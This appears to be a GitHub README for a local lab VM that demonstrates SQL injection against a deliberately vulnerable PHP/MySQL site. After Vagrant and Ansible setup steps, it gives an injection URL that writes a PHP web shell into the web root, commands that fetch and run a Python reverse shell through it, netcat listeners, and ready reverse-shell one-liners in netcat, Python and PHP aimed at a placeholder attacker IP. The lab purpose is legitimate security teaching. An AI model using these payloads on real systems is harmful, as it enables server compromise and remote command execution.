Skip to content

Latest commit

 

History

History
74 lines (47 loc) · 2.71 KB

README.md

File metadata and controls

74 lines (47 loc) · 2.71 KB

SQL INJECTION ATTACK EXAMPLE

This is a small project to show how easy it can be to exploit SQL injection and how dangerous it can be.

Setup Instructions

In order to setup locally, you will need Virtualbox, Vagrant and Ansible installed on your work machine.

// Clone the repository to your work machine.
# git clone [email protected]:doublehops/sql-injection-attack-example.git

// Change into the new directory download and run the virtual machine with:
# vagrant up

// Ensure you can ssh into the virtual machine:
# ssh [email protected] -i .vagrant/machines/default/virtualbox/private_key

// Use Ansible to provision (install the webserver, PHP, MariaDB/MYSQL) the box with the following:
# dev/provision.sh local_dev

// Import database schema and data into database:
# dev/ssh-import-database.sh

// Load the webpage in your browser to check all is well: http://192.168.30.99

Play Around with SQL Injection

I have added an example of how to exploit an SQL Injection vulnerability by changing the passwords of all users in the user table. SQL Injection Playground. You need to reload the page to see the results as the select query is executed before the update request.

Gain Shell Access to Webserver with the Help of SQL Injection

Inject SQL that will create a PHP script that will run passed commads: http://192.168.30.99/login.php?username=d%27;select%20%22%3C?php%20system($_GET[%27cmd%27]);%22%20into%20outfile%20%22/var/www/web/images/system.php%22;

PYTHON BACKDOOR

Download Python reverse shell
http://192.168.30.99/images/system.php?cmd=wget%20http://192.168.30.99/scripts/reverse-shell.py -O /tmp/reverse-shell.py

Setup the waiting prompt on your host machine - Netcat must be installed:
nc -nlvp 4444

Run new Python reverse shell.
http://192.168.30.99/images/system.php?cmd=/tmp/reverse-shell.py

The terminal on the host machine waiting for connection should be connected now. Try typing ls -l /var/www/web to see the files listed.

example image

NOTES

Setup host machine for incoming connections:
nc -nvlp 4444

Run reverse shell command on foreign machine:

Netcat reverse shell:
nc.traditional -e /bin/sh <host> 4444

Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP reverse shell:
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'